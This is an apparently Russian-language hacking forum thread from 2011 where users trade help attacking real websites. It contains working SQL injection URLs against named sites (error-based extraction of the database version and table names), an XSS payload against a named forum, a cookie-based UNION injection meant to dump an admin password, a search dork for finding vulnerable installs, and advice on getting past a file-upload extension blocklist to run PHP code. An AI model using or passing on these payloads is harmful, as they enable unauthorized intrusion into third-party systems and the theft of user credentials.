 |
|

14.06.2011, 21:34
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами:
8462565
Репутация:
0
|
|
Сообщение от qaz
Подскажите плыз как разкрутить подобную скулю http://uzmob.uz/profile.php?mode=viewprofile&u=692
сам не смог ничего сделать, пробовалв sqlhelper'e он тоже ничего не сделал кроме того что определил что это sql union inj
И у меня есть пару вопросов
есть сайт, просканил директории нашол файл .bash_history
открыл его там такое:
Код:
crontab -e
svs@a18-swforum ~ $ crontab -e
crontabs/svs: Permission denied
ls -la
ps aux
ps aux
ps aux
ps aux
ps aux
crontab -e
man crontab
exit
что это? И если на сайте отображается код JS ну например открываю ссылку site.com/pngfix.js оно мне выдает код скрипта, это нормально?
и последнее:
перебираю страницы на сайте и наткнулся на такое:
http://site.com/?id=7 страница выдала
Код:
can't select db: Could not locate entry in sysdatabases for database 'название базы'. No entry found with that name. Make sure that the name is entered correctly.
сканил сайт сканером WVS он выдал что здесь http://forum.shock-world.com/journal.php?"onmouseover=prompt(987671)>
XSS но я в них мало шарю, что с нее выжать можно?
вобщем есть за что хвататься?
|
|
|

15.06.2011, 07:23
|
|
Участник форума
Регистрация: 27.08.2010
Сообщений: 154
С нами:
8268086
Репутация:
7
|
|
Сообщение от FlaktW
В чем причина?
Так выводится:
http://www.liftnn.ru/page.php?path=0.25)+or+(SeLect+count(*)+from+(sele ct+1+UnIoN+select+2+UnIoN+select+3)x%20+group+by+c oncat(version(),floor(rand(0)*2)))%23
Duplicate entry '5.1.41-log1' for key 'group_key'
а, так нет:
http://www.liftnn.ru/page.php?path=0.25)+or+1+group+by+concat((select+/*!table_name*/+/*!from*/+/*!information_schema*/./*!tables*/+/*!limit*/+0,1),floor(rand(0)*2))/*!having*/+count(*)+or+1%23
http://www.liftnn.ru/page.php?path=0 .25
там точка используется для разбиения переданного параметра, поэтому второй запрос и не работает
http://www.liftnn.ru/page.php?path=3)+or+1+group+by+concat((select+123+ from+pages+limit+0,1),floor(rand(0)*2))having+min( 0)+or+1%23 работает
http://www.liftnn.ru/page.php?path=3)+or+1+group+by+concat((select+123+ from+sttsnn_lift2.pages+limit+0,1),floor(rand(0)*2 ))having+min(0)+or+1%23 не работает, т.к. точкой разбили запрос
бруть таблицы либо ищи способ обойтись без точки
|
|
|

15.06.2011, 12:40
|
|
Новичок
Регистрация: 14.06.2011
Сообщений: 19
С нами:
7849046
Репутация:
0
|
|
Бывают 2 вида скуль инъекции это обычные и слепые, но все они находятся по разному, киньте ссылки на статьи к способам их нахождения.
|
|
|

15.06.2011, 12:47
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 18
С нами:
8620247
Репутация:
0
|
|
|
|
|

15.06.2011, 17:59
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами:
8263766
Репутация:
11
|
|
Сообщение от Seravin
url decode сделал хотя бы...
а вообще предположу что надо либо group_concat либо limit использовать
пробовал group_concat либо limit не выводит ничего
|
|
|

15.06.2011, 22:31
|
|
Участник форума
Регистрация: 27.08.2010
Сообщений: 154
С нами:
8268086
Репутация:
7
|
|
есть уязвимый сервер, могу заливать все типы файлов кроме:
$Config['DeniedExtensions']['File'] = array('php','asp','aspx','ascx','jsp','cfm','cfc', 'pl','bat','exe','dll','reg') ;
пробовал php3, phtml, xinc, различные комбинации по типу php.jpg, не выполняются, а скачиваются
сервер под nginx, поэтому htaccess не пойдет
lfi не нашел
что можно еще поробовать?
|
|
|

15.06.2011, 23:01
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
С нами:
9128075
Репутация:
3
|
|
кусок уязвимого кода
Сообщение от None
";
echo $row["username"];
echo "";
echo $row["visits"];
echo "";
}
echo "";
?>
структура таблицы
Сообщение от None
CREATE TABLE `tb_users` (
`id` int(11) NOT NULL auto_increment,
`username` varchar(15) NOT NULL,
`password` varchar(100) NOT NULL,
`ip` varchar(15) NOT NULL,
`email` varchar(150) NOT NULL,
`pemail` varchar(150) NOT NULL,
`referer` varchar(15) NOT NULL,
`country` varchar(150) NOT NULL,
`visits` varchar(150) NOT NULL default '0',
`referals` varchar(150) NOT NULL default '0',
`referalvisits` varchar(150) NOT NULL default '0',
`money` varchar(150) NOT NULL default '0.00',
`paid` varchar(150) NOT NULL default '0.00',
`joindate` varchar(150) NOT NULL,
`lastlogdate` varchar(150) NOT NULL,
`lastiplog` varchar(150) NOT NULL,
`account` varchar(150) NOT NULL,
`user_status` varchar(15) NOT NULL default 'user',
KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=cp1251 AUTO_INCREMENT=20 ;
чему должна быть равна переменная $lole для вывода password where username admin?
|
|
|

15.06.2011, 23:18
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от vaddd
кусок уязвимого кода
структура таблицы
чему должна быть равна переменная $lole для вывода password where username admin?
Должно быть mq = off;
Попробуй
Cookie: UsNick = ' union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8 from tb_users where username='admin'-- 1
Скинь ссылку в пм. Догадываюсь что за движок (bux какой-то).
|
|
|

15.06.2011, 23:24
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
С нами:
9128075
Репутация:
3
|
|
Сообщение от Фараон
Должно быть mq = off;
Попробуй
Cookie: UsNick = ' union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8 from tb_users where username='admin'-- 1
Скинь ссылку в пм. Догадываюсь что за движок (bux какой-то).
inurl:advertisewmz.php
уязвимый сценарий referals.php, он в той же папке
спасибо за ответ, попробую завтра
принтабельные цифры будут 2,9?
|
|
|

15.06.2011, 23:26
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 18
С нами:
8620247
Репутация:
0
|
|
Сообщение от freezed
есть уязвимый сервер, могу заливать все типы файлов кроме:
$Config['DeniedExtensions']['File'] = array('php','asp','aspx','ascx','jsp','cfm','cfc', 'pl','bat','exe','dll','reg') ;
пробовал php3, phtml, xinc, различные комбинации по типу php.jpg, не выполняются, а скачиваются
сервер под nginx, поэтому htaccess не пойдет
lfi не нашел
что можно еще поробовать?
Попробуй что нибудь из этого
Минифак по загрузке php кода вместо картинок
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|